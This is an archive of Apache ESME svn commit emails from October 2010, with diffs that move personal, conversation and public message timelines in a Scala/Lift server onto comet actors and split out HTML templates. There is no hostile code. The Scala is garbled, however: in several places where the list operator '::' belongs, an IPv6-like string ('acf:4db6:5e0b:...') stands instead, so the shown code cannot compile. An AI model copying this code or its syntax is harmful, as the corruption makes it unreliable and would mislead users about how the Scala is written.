tag timelines. Added: incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/ConversationTimeline.scala incubator/esme/trunk/server/src/main/webapp/templates-hidden/message_update_box.html incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_conversation.html incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_personal.html Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/ConvDistributor.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PersonalTimeline.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/Timeline.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala incubator/esme/trunk/server/src/main/webapp/info_view/conversation.html incubator/esme/trunk/server/src/main/webapp/style/style.css incubator/esme/trunk/server/src/main/webapp/templates-hidden/message.html incubator/esme/trunk/server/src/main/webapp/templates-hidden/message_core.html Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/ConvDistributor.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/ConvDistributor.scala?rev=1023718&r1=1023717&r2=1023718&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/ConvDistributor.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/ConvDistributor.scala Mon Oct 18 10:01:11 2010 @@ -23,24 +23,39 @@ import net.liftweb._ import actor._ import org.apache.esme._ -import model.{Message, User, ConvFollowReason} +import model.{Message, User, ConvFollowReason, NoReason, MailboxReason} -object ConvDistributor extends LiftActor { +import scala.collection.mutable.HashMap - println("ConvDistributor started") - +object ConvDistributor extends LiftActor { + protected def messageHandler = { case Distributor.NewMessage(msg) => { Message.findMessages(List(msg.conversation)).values.toList.map( m => { m.followers.refresh.map( u => { Distributor ! Distributor.AddMessageToMailbox(u.id, msg, ConvFollowReason(m.id)); - }) + }) + listeners.getOrElse(m, List()).map( + _ ! MessageReceived(msg, NoReason) + ) }) } + + case Listen(conv, who) => + listeners.update(conv, who acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b listeners.getOrElse(conv, List())) + + case Unlisten(conv, who) => + listeners.update(conv, listeners.getOrElse(conv, List()).filter( _ ne who)) } def touch { - } + } + + private var listeners: HashMap[Message,List[LiftActor]] = new HashMap + + case class Listen(conv:Message,who:LiftActor) + case class Unlisten(conv:Message,who:LiftActor) + case class MessageReceived(msg: Message, reason: MailboxReason) } \ No newline at end of file Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala?rev=1023718&r1=1023717&r2=1023718&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala Mon Oct 18 10:01:11 2010 @@ -64,8 +64,19 @@ object Distributor extends LiftActor { findOrCreateUser(user) ! UserActor.Listen(who) case Unlisten(user, who) => - findOrCreateUser(user) ! UserActor.Unlisten(who) - + findOrCreateUser(user) ! UserActor.Unlisten(who) + + case ListenObject(listenable, who) => listenable match { + case u:User => findOrCreateUser(u.id) ! UserActor.Listen(who) + case c:Message => ConvDistributor ! ConvDistributor.Listen(c,who) + case x => println("This is all wrong " + x) + } + + case UnlistenObject(listenable, who) => listenable match { + case u:User => findOrCreateUser(u.id) ! UserActor.Unlisten(who) + case c:Message => ConvDistributor ! ConvDistributor.Unlisten(c,who) + } + case LatestMessages(user, cnt) => forwardMessageTo(UserActor.LatestMessages(cnt), findOrCreateUser(user)) @@ -109,7 +120,9 @@ object Distributor extends LiftActor { pool: Box[Long]) case class AddMessageToMailbox(user: Long, message: Message, reason: MailboxReason) case class Listen(user: Long, who: LiftActor) - case class Unlisten(user: Long, who: LiftActor) + case class Unlisten(user: Long, who: LiftActor) + case class ListenObject(listenable: Any, who: LiftActor) + case class UnlistenObject(listenable: Any, who: LiftActor) case class LatestMessages(user: Long, cnt: Int) case class NewMessage(msg: Message) case class UpdateTrackingFor(user: Long, which: TrackingType) Added: incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/ConversationTimeline.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/ConversationTimeline.scala?rev=1023718&view=auto ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/ConversationTimeline.scala (added) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/ConversationTimeline.scala Mon Oct 18 10:01:11 2010 @@ -0,0 +1,59 @@ +/** + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + +package org.apache.esme.comet + +import net.liftweb.common._ +import net.liftweb.mapper._ +import net.liftweb.http._ +import net.liftweb.util.Helpers.TimeSpan + +import org.apache.esme._ +import actor.{Distributor,UserActor,ConvDistributor} +import model._ + +class ConversationTimeline extends Timeline { + + val jsId = "conversation_timeline_messages" + var convId:Long = S.param("cid").map(_.toLong).openOr(-1L) + var convMess:Message = Message.findMessages(List(convId)).values.toList.first + + override def localSetup() { + super.localSetup() + + Distributor ! Distributor.ListenObject(convMess, this) + messages = Message.findAndPrime(By(Message.conversation, convId), + OrderBy(Message.id, Descending)).map( m => + (m.id.is, NoReason, false)).take(40) + } + + override def localShutdown() { + super.localShutdown() + Distributor ! Distributor.UnlistenObject(convMess, this) + } + + override def lifespan = Full(TimeSpan(300000)) + + override def lowPriority = { + case ConvDistributor.MessageReceived(msg, r) => + messages = ((msg.id.is,r,false) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b messages).take(40) + reRender(false) + } + +} \ No newline at end of file Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PersonalTimeline.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PersonalTimeline.scala?rev=1023718&r1=1023717&r2=1023718&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PersonalTimeline.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PersonalTimeline.scala Mon Oct 18 10:01:11 2010 @@ -22,10 +22,12 @@ package org.apache.esme.comet import net.liftweb.common._ import org.apache.esme._ -import actor.Distributor +import actor.{Distributor,UserActor} import model._ -class PersonalTimeline extends Timeline { +class PersonalTimeline extends Timeline { + + val jsId = "personal_timeline_messages" override def localSetup() { super.localSetup() @@ -36,6 +38,29 @@ class PersonalTimeline extends Timeline case x => } } - } + } + + override def localShutdown() { + super.localShutdown() + for (user <- User.currentUser) { + Distributor ! Distributor.Unlisten(user.id, this) + } + } + + override def lowPriority = { + case UserActor.MessageReceived(msg, r) => + messages = ( (msg.id.is,r,false) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b messages).take(40) + reRender(false) + + case UserActor.Resend(msgId) => + messages = messages.map { + case (`msgId`, r, _) => (msgId, r, true) + case x => x + } + reRender(false) + + case Distributor.UserUpdated(_) => + reRender(false) + } } \ No newline at end of file Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/Timeline.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/Timeline.scala?rev=1023718&r1=1023717&r2=1023718&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/Timeline.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/Timeline.scala Mon Oct 18 10:01:11 2010 @@ -36,7 +36,8 @@ import lib._ import java.text._ trait Timeline extends CometActor { - protected var messages: List[(Long,MailboxReason,Boolean)] = Nil + protected var messages: List[(Long,MailboxReason,Boolean)] = Nil + protected val jsId: String override def localSetup() { super.localSetup() @@ -44,9 +45,6 @@ trait Timeline extends CometActor { override def localShutdown() { super.localShutdown() - for (user <- User.currentUser) { - Distributor ! Distributor.Unlisten(user.id, this) - } } def render = { @@ -55,7 +53,6 @@ trait Timeline extends CometActor { for ((id, reason, resent) <- messages; msg <- msgMap.get(id)) yield (msg, reason, resent) - val jsId = "personal_timeline_messages"; OnLoad(JsCrVar(jsId, JsArray( toDisplay.map{case (msg, reason, resent) => @@ -63,20 +60,4 @@ trait Timeline extends CometActor { } :_*)) & JsFunc("displayMessages", JsVar(jsId), jsId).cmd) } - - override def lowPriority = { - case UserActor.MessageReceived(msg, r) => - messages = ( (msg.id.is,r,false) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b messages).take(40) - reRender(false) - - case UserActor.Resend(msgId) => - messages = messages.map { - case (`msgId`, r, _) => (msgId, r, true) - case x => x - } - reRender(false) - - case Distributor.UserUpdated(_) => - reRender(false) - } } Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala?rev=1023718&r1=1023717&r2=1023718&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala Mon Oct 18 10:01:11 2010 @@ -49,8 +49,7 @@ object ConversationMgr { val menuItems = Menu(Loc("conversation", List("info_view", "conversation"), S.?("base_conv_menu"), ifIsLoggedIn, - Loc.Snippet("conv_info", convInfo))) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b - Nil + Loc.Snippet("conv_info", convInfo))) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b Nil def convInfo(in: NodeSeq): NodeSeq = { @@ -81,25 +80,12 @@ object ConversationMgr { ret.open_! } - def displayConversation(in: NodeSeq): NodeSeq = { - - val jsId = "timeline_messages" - - val msgs = Message.findAndPrime(By(Message.conversation, cid), - OrderBy(Message.id, Descending)) - - Script( - OnLoad(JsCrVar(jsId, JsArray( - msgs.map(m => JsObj(("message", m.asJs)) ) :_*)) & - JsFunc(" displayMessages", JsVar(jsId), jsId).cmd) - ) - - } - + def cometTimeline = <lift:comet type="ConversationTimeline" name={"conv"+cid} /> + def updateFollow: JsCmd = SetHtml("following", followOrUnfollow) bind("conv", in, - "followButton" -> followOrUnfollow, - "displayConversation" -> displayConversation _ ) + "cometTimeline" -> cometTimeline, + "followButton" -> followOrUnfollow ) } } Modified: incubator/esme/trunk/server/src/main/webapp/info_view/conversation.html URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/webapp/info_view/conversation.html?rev=1023718&r1=1023717&r2=1023718&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/webapp/info_view/conversation.html (original) +++ incubator/esme/trunk/server/src/main/webapp/info_view/conversation.html Mon Oct 18 10:01:11 2010 @@ -16,26 +16,17 @@ specific language governing permissions and limitations * under the License. * --> -<lift:surround with="base" at="left"> - <lift:TableSorterSnip/> +<lift:surround with="base" at="left"> <link rel="stylesheet" type="text/css" href="../style/style.css" /> - <head> - <script src="../scripts/display_messages.js" type="text/javascript"/> - <script src="../scripts/pretty.js" type="text/javascript"/> - </head> - <div id="back-header"> - <lift:conv_info> <h1><lift:loc>ui_default_conversation</lift:loc></h1> - <div class="container-aux"> - <span id="following"><conv:followButton/></span> - <div> - <conv:displayConversation/> - <lift:embed what="templates-hidden/message_core"/> - </div> - </div><!--container-settings--> - </lift:conv_info> - </div> + </div> + <div class="container-aux"> + <lift:conv_info> + <span id="following"><conv:followButton/></span> + </lift:conv_info> + <lift:embed what="templates-hidden/timeline_conversation"/> + </div> </lift:surround> Modified: incubator/esme/trunk/server/src/main/webapp/style/style.css URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/webapp/style/style.css?rev=1023718&r1=1023717&r2=1023718&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/webapp/style/style.css (original) +++ incubator/esme/trunk/server/src/main/webapp/style/style.css Mon Oct 18 10:01:11 2010 @@ -425,7 +425,7 @@ ul.main-links { .updates-box { float:left; - padding:10px 20px; + padding:10px 0px; word-wrap:break-word; border:1px; } @@ -442,14 +442,7 @@ ul.main-links { .update2 { float:left; width:500px; - padding:0 10px; -} - - -.update2 { - float:left; - width:500px; - padding:0 10px; + padding:0px; } .tag, .tag a { margin:10px 0 2px; Modified: incubator/esme/trunk/server/src/main/webapp/templates-hidden/message.html URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/webapp/templates-hidden/message.html?rev=1023718&r1=1023717&r2=1023718&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/webapp/templates-hidden/message.html (original) +++ incubator/esme/trunk/server/src/main/webapp/templates-hidden/message.html Mon Oct 18 10:01:11 2010 @@ -19,123 +19,12 @@ -<lift:surround with="base_top" at="left"> -<head> - <script src="scripts/display_messages_top.js" type="text/javascript"/> - <script src="scripts/pretty.js" type="text/javascript"/> -</head> - <div id="left"> - <div id="back-header"> - <!---UPDATE BOX --> - <div class="container-update"> - <h3 id="message_request"> - <lift:loc>ui_messages_message_label_message_request</lift:loc> - </h3> - <div id="form-update"> - <div id="messages"></div> - <div class="post-form-row"> - <textarea class="inputBox2 tipelement" title="Enter your status message here." id="vMsg" rows="5" cols="80%"></textarea> - <div class="row clear" style="display: none"> - <input id="vTag" style="width: 90%"/> - </div> - </div> - <div class="row clear" style="display: none" id="reply-to-div"> - <p> - <b><lift:loc>ui_messages_message_label_message_reply</lift:loc></b> - <span id="reply-to-span"><i></i></span> - <a href="javascript: clearReplyTo()"> - <lift:loc>ui_messages_message_label_message_remove_reply</lift:loc> - </a> - </p> - </div> - <div class="post-form-row"> - <div class="share-select"> - <label> - <lift:loc>ui_messages_share</lift:loc> - </label> - <select id="vPool" class="inputBox2 tipelement" title="Select the pool in which your message should be submitted"> - <option value="0"> - <lift:loc>ui_messages_message_label_message_pool_public</lift:loc> - </option> - <lift:UserSnip.accessPools/> - </select> - </div> - <div class="update-btn"> - <input type="image" onclick="javascript:post_msg();" src="images/btn-update.gif" /> - </div> - </div> - <script> - // <![CDATA[ - var currentConvNumber = 0; - - function setReplyTo(id, text, msgPool, author){ - currentConvNumber = id; - document.getElementById('reply-to-div').style.display = "block"; - jQuery('#message_request').html("Reply to: " + author); - var rep_msg = text - if (text.length > 50) - rep_msg = text.substr(0, 47) + "..." - jQuery('#reply-to-span').html(rep_msg); - jQuery('#vMsg').val("@" + author + " ") - jQuery('#vMsg').focus() - jQuery('#vPool').val(msgPool); - } - - function clearReplyTo(){ - currentConvNumber = 0; - document.getElementById('reply-to-div').style.display = "none"; - jQuery('#vPool').val(0); - jQuery('#message_request').html('What are you working on?'); - } - - function clearResend(id){ - document.getElementById(id).style.display = "none" - } - - // ]]> - </script> - <lift:UserSnip.postScript/> - </div> - </div> - <!--END UPDATE BOX--> - </div> - <lift:UserSnip.resendScript/> - <!--updates-box --> - <lift:comet type="PersonalTimeline"/> - <div id="personal_timeline_messages"> - - <div class="updates-box" id="message"> - <div class="avatar"> - <img id="avatar" width="40px"/> - </div> <!--end avatar--> - <div class="update2"> - - <div class="info2"> - <a href="" id="author"/> - <div id="msgbody"/> - <div class="supp_data_class" id="supp_data"/> - </div> <!--end info2--> - - - <div class="actions"> - <a href="#" id="resend"> - <lift:loc>ui_messages_message_label_resend</lift:loc> - </a> - <span id="resend">| </span> - <a href="#" id="reply"> - <lift:loc>ui_messages_message_label_reply</lift:loc> - </a> - <span id="conversation">| </span> - <a id="conversation"> - <lift:loc>ui_messages_message_label_conversation</lift:loc> - </a> - </div> <!--end actions--> - <div id="msgsep" class="separator"></div> <!-- separator works here but is too short--> - </div> <!--end update2--> - - </div> <!--end updates-box--> - <!-- <div id="msgsep" class="separator"/> seprator should be here but doesn't work--> - - </div> - </div> +<lift:surround with="base_top" at="left"> + <div id="back-header"> + <lift:embed what="templates-hidden/message_update_box"/> + </div> + + <div class="container-aux"> + <lift:embed what="templates-hidden/timeline_personal"/> + </div> </lift:surround> \ No newline at end of file Modified: incubator/esme/trunk/server/src/main/webapp/templates-hidden/message_core.html URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/webapp/templates-hidden/message_core.html?rev=1023718&r1=1023717&r2=1023718&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/webapp/templates-hidden/message_core.html (original) +++ incubator/esme/trunk/server/src/main/webapp/templates-hidden/message_core.html Mon Oct 18 10:01:11 2010 @@ -17,31 +17,28 @@ under the License. * --> -<div id="timeline_messages"> +<div> <head> <script src="../scripts/display_messages_top.js" type="text/javascript" /> <script src="../scripts/pretty.js" type="text/javascript" /> </head> - <div class="updates-box" id="message"> - <div class="avatar"> - <img id="avatar" width="40px" /> - </div> - <!--end avatar--> - <div class="update2"> - <div class="info2"> - <a href="" id="author" /> - <div id="msgbody" /> - <div class="supp_data_class" id="supp_data" /> - </div> - <!--end info2--> - <div class="actions"></div> - <!--end actions--> - <div id="msgsep" class="separator"></div> - <!-- separator works here but is too short--> - </div> - <!--end update2--> - </div> - <!--end updates-box--> + <div class="updates-box" id="message"> + <div class="avatar"> + <img id="avatar" width="40px"/> + </div> <!--end avatar--> + <div class="update2"> + + <div class="info2"> + <a href="" id="author"/> + <div id="msgbody"/> + <div class="supp_data_class" id="supp_data"/> + </div> <!--end info2--> + + <div class="actions"></div> <!--end actions--> + <div id="msgsep" class="separator"></div> <!-- separator works here but is too short--> + </div> <!--end update2--> + + </div> <!--end updates-box--> <!-- <div id="msgsep" class="separator"/> seprator should be here but doesn't work--> </div> Added: incubator/esme/trunk/server/src/main/webapp/templates-hidden/message_update_box.html URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/webapp/templates-hidden/message_update_box.html?rev=1023718&view=auto ============================================================================== --- incubator/esme/trunk/server/src/main/webapp/templates-hidden/message_update_box.html (added) +++ incubator/esme/trunk/server/src/main/webapp/templates-hidden/message_update_box.html Mon Oct 18 10:01:11 2010 @@ -0,0 +1,91 @@ +<!-- + Licensed to the Apache Software Foundation (ASF) under one * + or more contributor license agreements. See the NOTICE file * + distributed with this work for additional information * + regarding copyright ownership. The ASF licenses this file * + to you under the Apache License, Version 2.0 (the * + "License"); you may not use this file except in compliance * + with the License. You may obtain a copy of the License at * + * + http://www.apache.org/licenses/LICENSE-2.0 * + * + Unless required by applicable law or agreed to in writing, * + software distributed under the License is distributed on an * + "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * + KIND, either express or implied. See the License for the * + specific language governing permissions and limitations * + under the License. * +--> + +<!---UPDATE BOX --> +<div class="container-update"> + <h3 id="message_request"> + <lift:loc>ui_messages_message_label_message_request</lift:loc> + </h3> + <div id="form-update"> + <div id="messages"></div> + <div class="post-form-row"> + <textarea class="inputBox2 tipelement" title="Enter your status message here." id="vMsg" rows="5" cols="80%"></textarea> + <div class="row clear" style="display: none"> + <input id="vTag" style="width: 90%"/> + </div> + </div> + <div class="row clear" style="display: none" id="reply-to-div"> + <p> + <b><lift:loc>ui_messages_message_label_message_reply</lift:loc></b> + <span id="reply-to-span"><i></i></span> + <a href="javascript: clearReplyTo()"> + <lift:loc>ui_messages_message_label_message_remove_reply</lift:loc> + </a> + </p> + </div> + <div class="post-form-row"> + <div class="share-select"> + <label> + <lift:loc>ui_messages_share</lift:loc> + </label> + <select id="vPool" class="inputBox2 tipelement" title="Select the pool in which your message should be submitted"> + <option value="0"> + <lift:loc>ui_messages_message_label_message_pool_public</lift:loc> + </option> + <lift:UserSnip.accessPools/> + </select> + </div> + <div class="update-btn"> + <input type="image" onclick="javascript:post_msg();" src="images/btn-update.gif" /> + </div> + </div> + <script> + // <![CDATA[ + var currentConvNumber = 0; + + function setReplyTo(id, text, msgPool, author){ + currentConvNumber = id; + document.getElementById('reply-to-div').style.display = "block"; + jQuery('#message_request').html("Reply to: " + author); + var rep_msg = text + if (text.length > 50) + rep_msg = text.substr(0, 47) + "..." + jQuery('#reply-to-span').html(rep_msg); + jQuery('#vMsg').val("@" + author + " ") + jQuery('#vMsg').focus() + jQuery('#vPool').val(msgPool); + } + + function clearReplyTo(){ + currentConvNumber = 0; + document.getElementById('reply-to-div').style.display = "none"; + jQuery('#vPool').val(0); + jQuery('#message_request').html('What are you working on?'); + } + + function clearResend(id){ + document.getElementById(id).style.display = "none" + } + + // ]]> + </script> + <lift:UserSnip.postScript/> + </div> +</div> +<!--END UPDATE BOX--> \ No newline at end of file Added: incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_conversation.html URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_conversation.html?rev=1023718&view=auto ============================================================================== --- incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_conversation.html (added) +++ incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_conversation.html Mon Oct 18 10:01:11 2010 @@ -0,0 +1,29 @@ +<!-- + Licensed to the Apache Software Foundation (ASF) under one * + or more contributor license agreements. See the NOTICE file * + distributed with this work for additional information * + regarding copyright ownership. The ASF licenses this file * + to you under the Apache License, Version 2.0 (the * + "License"); you may not use this file except in compliance * + with the License. You may obtain a copy of the License at * + * + http://www.apache.org/licenses/LICENSE-2.0 * + * + Unless required by applicable law or agreed to in writing, * + software distributed under the License is distributed on an * + "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * + KIND, either express or implied. See the License for the * + specific language governing permissions and limitations * + under the License. * +--> + +<div id="conversation_timeline_messages"> + <head> + <script src="../scripts/display_messages_top.js" type="text/javascript"/> + <script src="../scripts/pretty.js" type="text/javascript"/> + </head> + <lift:conv_info> + <conv:cometTimeline /> + </lift:conv_info> + <lift:embed what="templates-hidden/message_core"/> +</div> Added: incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_personal.html URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_personal.html?rev=1023718&view=auto ============================================================================== --- incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_personal.html (added) +++ incubator/esme/trunk/server/src/main/webapp/templates-hidden/timeline_personal.html Mon Oct 18 10:01:11 2010 @@ -0,0 +1,58 @@ +<!-- + Licensed to the Apache Software Foundation (ASF) under one * + or more contributor license agreements. See the NOTICE file * + distributed with this work for additional information * + regarding copyright ownership. The ASF licenses this file * + to you under the Apache License, Version 2.0 (the * + "License"); you may not use this file except in compliance * + with the License. You may obtain a copy of the License at * + * + http://www.apache.org/licenses/LICENSE-2.0 * + * + Unless required by applicable law or agreed to in writing, * + software distributed under the License is distributed on an * + "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * + KIND, either express or implied. See the License for the * + specific language governing permissions and limitations * + under the License. * +--> + +<div id="personal_timeline_messages"> + <head> + <script src="../scripts/display_messages_top.js" type="text/javascript"/> + <script src="../scripts/pretty.js" type="text/javascript"/> + <lift:UserSnip.resendScript/> + <lift:comet type="PersonalTimeline"/> + </head> + + <div class="updates-box" id="message"> + <div class="avatar"> + <img id="avatar" width="40px"/> + </div> <!--end avatar--> + <div class="update2"> + + <div class="info2"> + <a href="" id="author"/> + <div id="msgbody"/> + <div class="supp_data_class" id="supp_data"/> + </div> <!--end info2--> + + <div class="actions"> + <a href="#" id="resend"> + <lift:loc>ui_messages_message_label_resend</lift:loc> + </a><span id="resend">| </span> + <a href="#" id="reply"> + <lift:loc>ui_messages_message_label_reply</lift:loc> + </a> + <span id="conversation">| </span> + <a id="conversation"> + <lift:loc>ui_messages_message_label_conversation</lift:loc> + </a> + </div> <!--end actions--> + <div id="msgsep" class="separator"></div> <!-- separator works here but is too short--> + </div> <!--end update2--> + + </div> <!--end updates-box--> + <!-- <div id="msgsep" class="separator"/> seprator should be here but doesn't work--> + +</div> \ No newline at end of file From [email protected] Mon Oct 18 15:13:48 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5080 invoked from network); 18 Oct 2010 15:13:48 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 18 Oct 2010 15:13:48 -0000 Received: (qmail 46011 invoked by uid 500); 18 Oct 2010 15:13:48 -0000 Delivered-To: [email protected] Received: (qmail 45976 invoked by uid 500); 18 Oct 2010 15:13:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <esme-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45968 invoked by uid 99); 18 Oct 2010 15:13:47 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 18 Oct 2010 15:13:47 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 18 Oct 2010 15:13:47 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 20BB123888D7; Mon, 18 Oct 2010 15:12:51 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1023839 - in /incubator/esme/trunk/server/src/main: scala/org/apache/esme/actor/Distributor.scala scala/org/apache/esme/comet/PublicTimeline.scala webapp/info_view/public.html Date: Mon, 18 Oct 2010 15:12:51 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: esjewett Date: Mon Oct 18 15:12:50 2010 New Revision: 1023839 URL: http://svn.apache.org/viewvc?rev=1023839&view=rev Log: [ESME-290] Fix the public timeline issue introduced by the refactoring for [ESME-287] and [ESME-289] Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PublicTimeline.scala incubator/esme/trunk/server/src/main/webapp/info_view/public.html Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala?rev=1023839&r1=1023838&r2=1023839&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala Mon Oct 18 15:12:50 2010 @@ -69,7 +69,7 @@ object Distributor extends LiftActor { case ListenObject(listenable, who) => listenable match { case u:User => findOrCreateUser(u.id) ! UserActor.Listen(who) case c:Message => ConvDistributor ! ConvDistributor.Listen(c,who) - case x => println("This is all wrong " + x) + case x => } case UnlistenObject(listenable, who) => listenable match { Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PublicTimeline.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PublicTimeline.scala?rev=1023839&r1=1023838&r2=1023839&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PublicTimeline.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PublicTimeline.scala Mon Oct 18 15:12:50 2010 @@ -59,7 +59,7 @@ class PublicTimeline extends CometActor scheduled = false val msgMap = Message.findMessages(messages) val toDisplay = messages.flatMap(msgMap.get) - val jsId = "timeline_messages"; + val jsId = "public_timeline_messages"; OnLoad(JsCrVar(jsId, JsArray( toDisplay.map(m => JsObj(("message", m.asJs)) ) :_*)) & Modified: incubator/esme/trunk/server/src/main/webapp/info_view/public.html URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/webapp/info_view/public.html?rev=1023839&r1=1023838&r2=1023839&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/webapp/info_view/public.html (original) +++ incubator/esme/trunk/server/src/main/webapp/info_view/public.html Mon Oct 18 15:12:50 2010 @@ -18,14 +18,14 @@ --> <lift:surround with="base" at="left"> - <div id="back-header"> - <div id="left"> - <h1><lift:loc>ui_public_title</lift:loc></h1> - <div class="container-public"> - <!--updates-box --> - <lift:comet type="PublicTimeline"/> - <lift:embed what="templates-hidden/message_core"/> + <div id="back-header"> + <h1><lift:loc>ui_public_title</lift:loc></h1> </div> - </div> -</div><!-- End demo --> + <div class="container-aux"> + <div id="public_timeline_messages"> + <!--updates-box --> + <lift:comet type="PublicTimeline"/> + <lift:embed what="templates-hidden/message_core"/> + </div> + </div> </lift:surround> \ No newline at end of file From [email protected] Tue Oct 19 06:44:39 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 15979 invoked from network); 19 Oct 2010 06:44:39 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 19 Oct 2010 06:44:39 -0000 Received: (qmail 73979 invoked by uid 500); 19 Oct 2010 06:44:39 -0000 Delivered-To: [email protected] Received: (qmail 73948 invoked by uid 500); 19 Oct 2010 06:44:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: 